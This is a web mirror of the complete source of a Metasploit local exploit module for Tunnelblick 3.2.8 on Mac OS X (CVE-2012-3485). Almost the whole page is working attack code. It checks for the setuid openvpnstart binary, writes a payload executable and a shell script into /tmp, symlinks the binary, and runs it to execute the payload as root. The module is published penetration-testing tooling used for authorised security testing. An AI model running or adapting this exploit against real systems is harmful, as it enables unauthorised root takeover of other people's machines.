Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/osx/local/setuid_tunnelblick.rb
19934 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ExcellentRanking

8


9
  include Msf::Post::OSX::Priv

10
  include Msf::Post::File

11
  include Msf::Exploit::EXE

12


13
  def initialize(info = {})

14
    super(

15
      update_info(

16
        info,

17
        {

18
          'Name' => 'Setuid Tunnelblick Privilege Escalation',

19
          'Description' => %q{

20
            This module exploits a vulnerability in Tunnelblick 3.2.8 on Mac OS X. The

21
            vulnerability exists in the setuid openvpnstart, where an insufficient

22
            validation of path names allows execution of arbitrary shell scripts as root.

23
            This module has been tested successfully on Tunnelblick 3.2.8 build 2891.3099

24
            over Mac OS X 10.7.5.

25
          },

26
          'References' => [

27
            [ 'CVE', '2012-3485' ],

28
            [ 'OSVDB', '84706' ],

29
            [ 'EDB', '20443' ],

30
            [ 'URL', 'http://blog.zx2c4.com/791' ]

31
          ],

32
          'License' => MSF_LICENSE,

33
          'Author' => [

34
            'Jason A. Donenfeld', # Vulnerability discovery and original Exploit

35
            'juan vazquez' # Metasploit module

36
          ],

37
          'DisclosureDate' => '2012-08-11',

38
          'Platform' => 'osx',

39
          'Arch' => [ ARCH_X86, ARCH_X64 ],

40
          'SessionTypes' => [ 'shell' ],

41
          'Targets' => [

42
            [ 'Tunnelblick 3.2.8 / Mac OS X x86', { 'Arch' => ARCH_X86 } ],

43
            [ 'Tunnelblick 3.2.8 / Mac OS X x64', { 'Arch' => ARCH_X64 } ]

44
          ],

45
          'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 },

46
          'DefaultTarget' => 0,

47
          'Notes' => {

48
            'Reliability' => UNKNOWN_RELIABILITY,

49
            'Stability' => UNKNOWN_STABILITY,

50
            'SideEffects' => UNKNOWN_SIDE_EFFECTS

51
          }

52
        }

53
      )

54
    )

55
    register_options [

56
      # These are not OptPath because it's a *remote* path

57
      OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),

58
      OptString.new("Tunnelblick", [ true, "Path to setuid openvpnstart executable", "/Applications/Tunnelblick.app/Contents/Resources/openvpnstart" ])

59
    ]

60
  end

61


62
  def base_dir

63
    datastore['WritableDir'].to_s

64
  end

65


66
  def check

67
    unless file? datastore['Tunnelblick']

68
      vprint_error 'openvpnstart not found'

69
      return CheckCode::Safe

70
    end

71


72
    check = cmd_exec("find  #{datastore["Tunnelblick"]} -type f -user root -perm -4000")

73


74
    unless check.include? 'openvpnstart'

75
      return CheckCode::Safe

76
    end

77


78
    CheckCode::Vulnerable

79
  end

80


81
  def clean

82
    file_rm(@link)

83
    cmd_exec("rm -rf #{base_dir}/openvpn")

84
  end

85


86
  def exploit

87
    if is_root?

88
      fail_with Failure::BadConfig, 'Session already has root privileges'

89
    end

90


91
    if check != CheckCode::Vulnerable

92
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'

93
    end

94


95
    unless writable? base_dir

96
      fail_with Failure::BadConfig, "#{base_dir} is not writable"

97
    end

98


99
    print_status("Creating directory...")

100
    cmd_exec "mkdir -p #{base_dir}/openvpn/openvpn-0"

101


102
    exe_name = rand_text_alpha(8)

103
    @exe_file = "#{base_dir}/openvpn/openvpn-0/#{exe_name}"

104
    print_status("Dropping executable #{@exe_file}")

105
    write_file(@exe_file, generate_payload_exe)

106
    cmd_exec "chmod +x #{@exe_file}"

107


108
    evil_sh = <<~EOF

109
      #!/bin/sh

110
      #{@exe_file}

111
    EOF

112


113
    @sh_file = "#{base_dir}/openvpn/openvpn-0/openvpn"

114
    print_status("Dropping shell script #{@sh_file}...")

115
    write_file(@sh_file, evil_sh)

116
    cmd_exec "chmod +x #{@sh_file}"

117


118
    link_name = rand_text_alpha(8)

119
    @link = "#{base_dir}/#{link_name}"

120
    print_status("Creating symlink #{@link}...")

121
    cmd_exec "ln -s -f -v #{datastore["Tunnelblick"]} #{@link}"

122


123
    print_status("Running...")

124
    begin

125
      cmd_exec "#{@link} OpenVPNInfo 0"

126
    rescue

127
      print_error("Failed. Cleaning files #{@link} and the #{base_dir}/openvpn directory")

128
      clean

129
      return

130
    end

131
    print_warning("Remember to clean files: #{@link} and the #{base_dir}/openvpn directory")

132
  end

133
end

134


135